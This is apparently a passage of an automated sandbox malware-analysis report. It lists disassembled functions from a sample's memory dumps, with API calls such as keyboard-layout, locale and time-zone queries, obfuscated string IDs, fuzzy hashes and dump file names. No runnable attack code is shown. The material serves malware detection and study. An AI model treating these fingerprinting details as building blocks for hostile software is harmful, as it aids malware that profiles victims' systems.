                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 28a2b6de051399eda86c88945b40a9b1db9206c20c67afc5f48936690361860d
                                • Instruction ID: 69086239dc82e83233b42b489a0bec19b266730fe184855457f8b88a7d9e371e
                                • Opcode Fuzzy Hash: 28a2b6de051399eda86c88945b40a9b1db9206c20c67afc5f48936690361860d
                                • Instruction Fuzzy Hash: 44313031A215559BCB22EF68EF85FDE77B9EF90325F100128F815AB291CB30DC058B92
                                Function 00D68CE6 Relevance: 11.6, Strings: 8, Instructions: 1617COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _r$+8l~$/h`c$7?t$r{%$AQ-$TUl$lR}
                                • API String ID: 0-1946983368
                                • Opcode ID: d470b8e478e07bbc17f7d86b5a4f51760b7e07298b9f90975cb95057e0debd32
                                • Instruction ID: 8b3c4d34c8681597a423fbfaedb3b6c8bf5b5be546a91efe9ab61f559da4b739
                                • Opcode Fuzzy Hash: d470b8e478e07bbc17f7d86b5a4f51760b7e07298b9f90975cb95057e0debd32
                                • Instruction Fuzzy Hash: DDB2F6F3A0C2049FE304AF29EC8567AFBE5EF94720F16493DEAC5C7744E63598018696
                                Function 009D2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009D2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009D2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009D2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009D2DEC
                                • LocalFree.KERNEL32(00000000), ref: 009D2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 43c14d6e71e95ddba6ec4d21b06f2f61597518d84cf54d8a672865f97341cf80
                                • Instruction ID: cc3e613aca217dfcf1052e5d0a36c2a50768897c0c2e205b93c2c22825466c2f
                                • Opcode Fuzzy Hash: 43c14d6e71e95ddba6ec4d21b06f2f61597518d84cf54d8a672865f97341cf80
                                • Instruction Fuzzy Hash: E5B11770940204CFC715CF18C988B99B7F5FB54329F29C5AAE408AB3A2D7769D86CF91
                                Function 00D74685 Relevance: 10.4, Strings: 7, Instructions: 1651COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }$#rw$$ba`$)/;}$9[uz$|->O$~^7
                                • API String ID: 0-3247793475
                                • Opcode ID: a705f7308a0eafa81f5ea4786de645c0bc73fd6023d4b451fb2e856b3a15f9a1
                                • Instruction ID: aad861f0a4987a2192180f6929f62ce08fa989d0f17fd87d85818283140eba5a
                                • Opcode Fuzzy Hash: a705f7308a0eafa81f5ea4786de645c0bc73fd6023d4b451fb2e856b3a15f9a1
                                • Instruction Fuzzy Hash: 67B205B360C6049FE7086E2DEC8567ABBE9EF94320F16893DE6C5C3744EA3558018797
                                Function 00D6A7FA Relevance: 9.1, Strings: 6, Instructions: 1578COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2Go$6bwO$@w7g$O>$sdv~$xT"d
                                • API String ID: 0-3626091568
                                • Opcode ID: b71d70f5c327816c90ceecbd45b603e9b25111c505cdedd49a8bd7967f63b06e
                                • Instruction ID: 9e132c0fd023f04e89ea62d86dd2d28ad27478563e6b0e81b8c52135844b3135
                                • Opcode Fuzzy Hash: b71d70f5c327816c90ceecbd45b603e9b25111c505cdedd49a8bd7967f63b06e
                                • Instruction Fuzzy Hash: DAB208F360C204AFE7046E29EC8567AFBE9EF94720F16493DEAC5C3740EA3558058697
                                Function 00D6F61B Relevance: 9.1, Strings: 6, Instructions: 1570COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ._$:'Uk$Q]O$Q]O$bp?$kem
                                • API String ID: 0-957755949
                                • Opcode ID: ae22af60b129f2472b00a954a7b32c25a3c5989f0875bfe798b30815a23369e9
                                • Instruction ID: ca98734ab32436692417d0c14b809b37b916f042e980966342ab2e69393d12ed
                                • Opcode Fuzzy Hash: ae22af60b129f2472b00a954a7b32c25a3c5989f0875bfe798b30815a23369e9
                                • Instruction Fuzzy Hash: 6DB227F3A0C2049FD3046E2DEC8567ABBE9EF94720F1A493DEAC5C3744EA3558058697
                                Function 009D2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 009D2C58
                                • wsprintfA.USER32 ref: 009D2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: b3b113d3da3e170bd96bbfcc8c69a06e3570f9f862093d157746200131807e1a
                                • Instruction ID: 76809dce8d0eda9a062b45b853ad9d7b9c72cad2e36c28a7a55acd3d0c3abe84
                                • Opcode Fuzzy Hash: b3b113d3da3e170bd96bbfcc8c69a06e3570f9f862093d157746200131807e1a
                                • Instruction Fuzzy Hash: 36012B71A40644ABCB189F58DC49F6DB77DEB84721F00436AF915DB3C0DB741D0486D1
                                Function 00D657FA Relevance: 7.9, Strings: 5, Instructions: 1611COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >s$DK#<$rJv7$z;$zV?
                                • API String ID: 0-2299592823
                                • Opcode ID: 419704e4072458abee6674c987fea02ed19bd06d1259156c6c2e9c8b9d02ea56
                                • Instruction ID: c5ff6203251c75bcc8a2a8ab9078c21bd07b47732dcce2dc317b0c380d422c41
                                • Opcode Fuzzy Hash: 419704e4072458abee6674c987fea02ed19bd06d1259156c6c2e9c8b9d02ea56
                                • Instruction Fuzzy Hash: 24B2E6F360C6049FE304AE2DEC8566AFBE9EFD4320F16893DE6C583744EA3558058697
                                Function 00D7B151 Relevance: 7.8, Strings: 5, Instructions: 1588COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dp{v$Gw}?$Z6?$oqVn$oj
                                • API String ID: 0-2096917618
                                • Opcode ID: 4a4810951c947092734681c2b34627ea0044216f25ba938f946611a669591b5a
                                • Instruction ID: c789ab9741c052a0334cf1f6d6fda1fa12da3f0ff16ff8e7957daa7a982a7834
                                • Opcode Fuzzy Hash: 4a4810951c947092734681c2b34627ea0044216f25ba938f946611a669591b5a
                                • Instruction Fuzzy Hash: 9AB206F360C204AFE3046E2DEC8567AFBE9EF94720F1A492DE6C4D3740EA3559058697
                                Function 00D672C0 Relevance: 7.8, Strings: 5, Instructions: 1572COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dl-.$I/p,$YYg$b;\{$}$7
                                • API String ID: 0-2756636191
                                • Opcode ID: cd2f35f1431408894731ee1c211ab4729a38258174ee60e9a0e3a424d8983512
                                • Instruction ID: 71a5b004da87a746544c2b0ac87a0934d57620842f5fbf814a62a80147832d68
                                • Opcode Fuzzy Hash: cd2f35f1431408894731ee1c211ab4729a38258174ee60e9a0e3a424d8983512
                                • Instruction Fuzzy Hash: AAB212F3A0C2009FE3046F2DEC8566ABBE5EF94760F1A493DEAC4C7744EA3558058693
                                Function 00D63DB7 Relevance: 7.8, Strings: 5, Instructions: 1561COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %2{w$(C_$W_"y$e'r$z;
                                • API String ID: 0-448224942
                                • Opcode ID: 792f13bc479334a68a1cefcc7b2c1333244f55a50f296a9cc4b3b438c08492b9
                                • Instruction ID: dc9ab177a11c734b99299d6a7de820961ec24346967c4c434de101310594bd7b
                                • Opcode Fuzzy Hash: 792f13bc479334a68a1cefcc7b2c1333244f55a50f296a9cc4b3b438c08492b9
                                • Instruction Fuzzy Hash: EAB2F5F360C2049FE304AE2DEC8167AB7E5EF94720F1A493DEAC5C7744EA3598018697
                                Function 009D1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 009D1B72
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D184F
                                  • Part of subcall function 009D1820: lstrlen.KERNEL32(010B7060), ref: 009D1860
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D1887
                                  • Part of subcall function 009D1820: lstrcat.KERNEL32(00000000,00000000), ref: 009D1892
